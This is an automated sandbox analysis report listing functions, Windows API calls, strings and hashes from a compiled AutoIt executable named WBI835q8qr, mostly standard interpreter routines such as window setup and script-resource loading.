Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 3110436726563d5efb68f6b502774527530b94d0be2ed17429c21816d710100d
Instruction ID: 3e9e3ec8f59f8fdffc5d0671d0dce1bebfa8d5baa918ec2146e2a9f2d0cd9849
Opcode Fuzzy Hash: 3110436726563d5efb68f6b502774527530b94d0be2ed17429c21816d710100d
Instruction Fuzzy Hash: 62510271D08298AACF21EBB4EC46AFD7BF8EF05B04F0041E5F519A7161DE748A45CB24

Function 00B249A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00B249CD

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

GetCurrentProcess.KERNEL32(?,00BAFAEC,00000000,00000000,?), ref: 00B24A9A
IsWow64Process.KERNEL32(00000000), ref: 00B24AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B24AE7
FreeLibrary.KERNEL32(00000000), ref: 00B24AF2
GetSystemInfo.KERNEL32(00000000), ref: 00B24B23
GetSystemInfo.KERNEL32(00000000), ref: 00B24B2F

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 86e1f7678a4c16c1e4d67caafaf0132b78cc23849a9e7ca11050fac18caf2de6
Instruction ID: bec20a669a8bdd1883674b8a65f97f643c1ba28883125a6bf901e1b1495de2ca
Opcode Fuzzy Hash: 86e1f7678a4c16c1e4d67caafaf0132b78cc23849a9e7ca11050fac18caf2de6
Instruction Fuzzy Hash: 7591D531989BD1DEC731CB7894912AAFFF5AF2A301B444AEDD0CB93A01D760A90CC759

Function 00B24E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00B24D8E,?,?,00000000,00000000), ref: 00B24E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B24D8E,?,?,00000000,00000000), ref: 00B24EB0
LoadResource.KERNEL32(?,00000000,?,?,00B24D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B24E2F), ref: 00B5D937
SizeofResource.KERNEL32(?,00000000,?,?,00B24D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B24E2F), ref: 00B5D94C
LockResource.KERNEL32(00B24D8E,?,?,00B24D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B24E2F,00000000), ref: 00B5D95F

Strings

SCRIPT, xrefs: 00B24EA6

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 6032050c141b49c43744ba6762443b591c79f66e9aff873bff9b52457b9b47b7
Instruction ID: 12484dbbcd9fcdd485f29d78c1c6211bf9a2a16188a4c001130570711a96e359
Opcode Fuzzy Hash: 6032050c141b49c43744ba6762443b591c79f66e9aff873bff9b52457b9b47b7
Instruction Fuzzy Hash: 71115E75240701BFE7259BA5EC49FB77BBAFBC6B11F1042A8F40986650DB61EC008A60

Function 00B8445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00B5E398), ref: 00B8446A
FindFirstFileW.KERNELBASE(?,?), ref: 00B8447B
FindClose.KERNEL32(00000000), ref: 00B8448B

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: f242401375e52fd5afbb0a1296f5b82e9599221ea28c52617fb1676bcdf0c28c
Instruction ID: 86d633676b795d35fb6bdc5173e5f6326853321c53c0953c15f1bc15853f2259
Opcode Fuzzy Hash: f242401375e52fd5afbb0a1296f5b82e9599221ea28c52617fb1676bcdf0c28c
Instruction Fuzzy Hash: 8BE092324106026742106A78EC4E5E97ADC9A06335F140755F835C21F0EFB45D009695

Function 00B2E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00B63E62

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 71b0dbd7a9a0afaae3c7e55f3ef9ff944f5f17fdc779c10b9a292654c7faa3db
Instruction ID: 6956fe3f66c58fac7198fb1abd81d23fdd48459cc6840a704592077062839214
Opcode Fuzzy Hash: 71b0dbd7a9a0afaae3c7e55f3ef9ff944f5f17fdc779c10b9a292654c7faa3db
Instruction Fuzzy Hash: E2A28C75A00225CFCB24CF59E4C0AAAB7F1FF59310F6481A9E929AB351D735ED42CB90

Function 00B309D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B30A5B
timeGetTime.WINMM ref: 00B30D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B30E53
Sleep.KERNEL32(0000000A), ref: 00B30E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00B30EFA
DestroyWindow.USER32 ref: 00B30F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B30F20
Sleep.KERNEL32(0000000A,?,?), ref: 00B64E83
TranslateMessage.USER32(?), ref: 00B65C60
DispatchMessageW.USER32(?), ref: 00B65C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B65C82

Strings

@GUI_CTRLID, xrefs: 00B64F3A
@TRAY_ID, xrefs: 00B6578F
@COM_EVENTOBJ, xrefs: 00B654F0
@GUI_CTRLHANDLE, xrefs: 00B64FE4
@GUI_WINHANDLE, xrefs: 00B64F8F

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 130f54cf095634da27ee7a8db13d88c1c417ca467270b64fbe692c6474966322
Instruction ID: 6f58678e1a0c665856ad40bf8a8593cd7b5add7d392270565d58427edfe0183f
Opcode Fuzzy Hash: 130f54cf095634da27ee7a8db13d88c1c417ca467270b64fbe692c6474966322
Instruction Fuzzy Hash: 61B2E270608741DFD738EF24C894BAAB7E4FF85304F24499DE59A972A1CB74E894CB42

Function 00B89155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B88F5F: __time64.LIBCMT ref: 00B88F69

Part of subcall function 00B24EE5: _fseek.LIBCMT ref: 00B24EFD

__wsplitpath.LIBCMT ref: 00B89234

Part of subcall function 00B440FB: __wsplitpath_helper.LIBCMT ref: 00B4413B

_wcscpy.LIBCMT ref: 00B89247
_wcscat.LIBCMT ref: 00B8925A
__wsplitpath.LIBCMT ref: 00B8927F
_wcscat.LIBCMT ref: 00B89295
_wcscat.LIBCMT ref: 00B892A8

Part of subcall function 00B88FA5: _memmove.LIBCMT ref: 00B88FDE
Part of subcall function 00B88FA5: _memmove.LIBCMT ref: 00B88FED

_wcscmp.LIBCMT ref: 00B891EF

Part of subcall function 00B89734: _wcscmp.LIBCMT ref: 00B89824
Part of subcall function 00B89734: _wcscmp.LIBCMT ref: 00B89837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B89452
_wcsncpy.LIBCMT ref: 00B894C5
DeleteFileW.KERNEL32(?,?), ref: 00B894FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B89511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B89522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B89534

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: cf863238b6143705ce8626fd80ed7b5775705e41ff8f74f9b955a7a83a6236cb
Instruction ID: 1c7b6d9ac411fa0fc54e0445956f39c4a0ea86263ba6637aa0700fa8b1a393d3
Opcode Fuzzy Hash: cf863238b6143705ce8626fd80ed7b5775705e41ff8f74f9b955a7a83a6236cb
Instruction Fuzzy Hash: 27C14BB1D00229AADF21EF94CC81AEEB7F9EF85310F0440E6F609E6151EB309A44DF65

Function 00B2301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B23074
RegisterClassExW.USER32(00000030), ref: 00B2309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B230AF
InitCommonControlsEx.COMCTL32(?), ref: 00B230CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B230DC
LoadIconW.USER32(000000A9), ref: 00B230F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B23101

Strings

0, xrefs: 00B23056
AutoIt v3 GUI, xrefs: 00B23090
+, xrefs: 00B2305D
TaskbarCreated, xrefs: 00B230A4

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: f5eb0a868444d328615b6d4744438909e40b7232fbc998616f83ecdf920d803f
Instruction ID: 87b943148e8fd3df229b9927b6730b0dc41c26ab5c702a87da530522b552bc5b
Opcode Fuzzy Hash: f5eb0a868444d328615b6d4744438909e40b7232fbc998616f83ecdf920d803f
Instruction Fuzzy Hash: 973129B194024AAFDB60DFE4D885BD9BBF4FB09314F10412AF680AB2A0DBB54581CF90

Function 00B23041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B23074
RegisterClassExW.USER32(00000030), ref: 00B2309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B230AF
InitCommonControlsEx.COMCTL32(?), ref: 00B230CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B230DC
LoadIconW.USER32(000000A9), ref: 00B230F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B23101

Strings

0, xrefs: 00B23056
AutoIt v3 GUI, xrefs: 00B23090
+, xrefs: 00B2305D
TaskbarCreated, xrefs: 00B230A4

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 961bec7514a3811372528d8c566b6e2a449f111a5b24d4e1f4d3f93147567696
Instruction ID: 901892a2a0cc9c866cbcd6a275b0ba35e22b4805380b5d5decdf9c3830da61f6
Opcode Fuzzy Hash: 961bec7514a3811372528d8c566b6e2a449f111a5b24d4e1f4d3f93147567696
Instruction Fuzzy Hash: 2B21C8B1901259AFDB20DFD4E889BEDBBF4FB09704F00412AF611AB2A0DBB145448F95

Function 00B2708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B24706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BE52F8,?,00B237AE,?), ref: 00B24724

Part of subcall function 00B4050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B27165), ref: 00B4052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B271A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B5E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B5E909
RegCloseKey.ADVAPI32(?), ref: 00B5E947
_wcscat.LIBCMT ref: 00B5E9A0

Strings

Include, xrefs: 00B5E8BF, 00B5E900
Software\AutoIt v3\AutoIt, xrefs: 00B2719E
\Include\, xrefs: 00B27165
\, xrefs: 00B5E9C3

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: b2e0f95081005333d2c9bfed0f1f8124bfa60d58c27edb80db9bb2d32c5a795d
Instruction ID: 295f080f62fdd8130c64d176fed38033345b268275413fb7ca87b915751c461c
Opcode Fuzzy Hash: b2e0f95081005333d2c9bfed0f1f8124bfa60d58c27edb80db9bb2d32c5a795d
Instruction Fuzzy Hash: 1D71AF715083519EC314EF65EC819ABBBE8FF55390B4009AEF5498B1B0EF70DA48CB92

Function 00B23A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B23A50
LoadCursorW.USER32(00000000,00007F00), ref: 00B23A5F
LoadIconW.USER32(00000063), ref: 00B23A76
LoadIconW.USER32(000000A4), ref: 00B23A88
LoadIconW.USER32(000000A2), ref: 00B23A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B23AC0
RegisterClassExW.USER32(?), ref: 00B23B16

Part of subcall function 00B23041: GetSysColorBrush.USER32(0000000F), ref: 00B23074
Part of subcall function 00B23041: RegisterClassExW.USER32(00000030), ref: 00B2309E
Part of subcall function 00B23041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B230AF
Part of subcall function 00B23041: InitCommonControlsEx.COMCTL32(?), ref: 00B230CC
Part of subcall function 00B23041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B230DC
Part of subcall function 00B23041: LoadIconW.USER32(000000A9), ref: 00B230F2
Part of subcall function 00B23041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B23101

Strings

AutoIt v3, xrefs: 00B23B05
#, xrefs: 00B23AFB
0, xrefs: 00B23AF4

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 451fb64fd84232e814996c23f7534e930083639d3f13d4a7c8b3602fd6362a2d
Instruction ID: a12bb52e0b66916e33fe174edd0a0f88625a557a9eed2fd075120ae61d6a1adf
Opcode Fuzzy Hash: 451fb64fd84232e814996c23f7534e930083639d3f13d4a7c8b3602fd6362a2d
Instruction Fuzzy Hash: DA212D71D00355AFEB20DFA4EC89B9D7BF4FB08715F100269E604AB2A1DBB95950CF94

Function 00B23633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00B236D2
KillTimer.USER32(?,00000001), ref: 00B236FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B2371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B2372A
CreatePopupMenu.USER32 ref: 00B2373E
PostQuitMessage.USER32(00000000), ref: 00B2374D

Strings

TaskbarCreated, xrefs: 00B23725

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c760b54c1672d5d4ba474c25670fe8450a178a14a1f0c2a38916f4de0c71d71c
Instruction ID: 8ff6a1838f12a4b5c4863230488ab1e878e0cf66f45f3e141964f57e62baa792
Opcode Fuzzy Hash: c760b54c1672d5d4ba474c25670fe8450a178a14a1f0c2a38916f4de0c71d71c
Instruction Fuzzy Hash: E64135B2204556BBCB346F64FC8ABB937D8EB01700F1406E5FA0A9B2B1CE699D059761

Function 00B23766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00B237AE
CMDLINERAW, xrefs: 00B237FB
/AutoIt3ExecuteScript, xrefs: 00B238BC
/AutoIt3OutputDebug, xrefs: 00B23892
/ErrorStdOut, xrefs: 00B2387D
CMDLINE, xrefs: 00B23822
/AutoIt3ExecuteLine, xrefs: 00B238A7

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: a78522b64c76e52ef7ff20d1364e8e83d916edc16744b863251c93064ceef678
Instruction ID: 692c5183153183e994ab67c9bcfe40a41cf1340792907233a19ed32cb410c2b0
Opcode Fuzzy Hash: a78522b64c76e52ef7ff20d1364e8e83d916edc16744b863251c93064ceef678
Instruction Fuzzy Hash: A4A14C7290022D9ACF15EBA0EC91AEEB7F8FF15700F4405A9F41AB7191DF749A48CB60

Function 00D5EBA0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D5EC71
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D5EE97

Memory Dump Source

Source File: 00000000.00000002.1429359956.0000000000D5C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D5C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d5c000_WBI835q8qr.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: d837492f682742436602fce0195316e180a0bc2a0c5f74aac9b0d61c489552f6
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: 77A12870E00208EBDF18DFA4C899BEEB7B5FF48305F248559E905BB280D7759A44DBA4

Function 00B239D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B23A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B23A24
ShowWindow.USER32(00000000,?,?), ref: 00B23A38
ShowWindow.USER32(00000000,?,?), ref: 00B23A41

Strings

edit, xrefs: 00B23A1E
AutoIt v3, xrefs: 00B239FB, 00B23A00, 00B23A01

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: f169b5ba23e41f822afa2555209b2e6961fa130f76158df0fd54f4eb9b80d18a
Instruction ID: 36b4dfb4d0e6886606794199b8e35ee333d22706c48cbdda18ae3a06bb917e18
Opcode Fuzzy Hash: f169b5ba23e41f822afa2555209b2e6961fa130f76158df0fd54f4eb9b80d18a
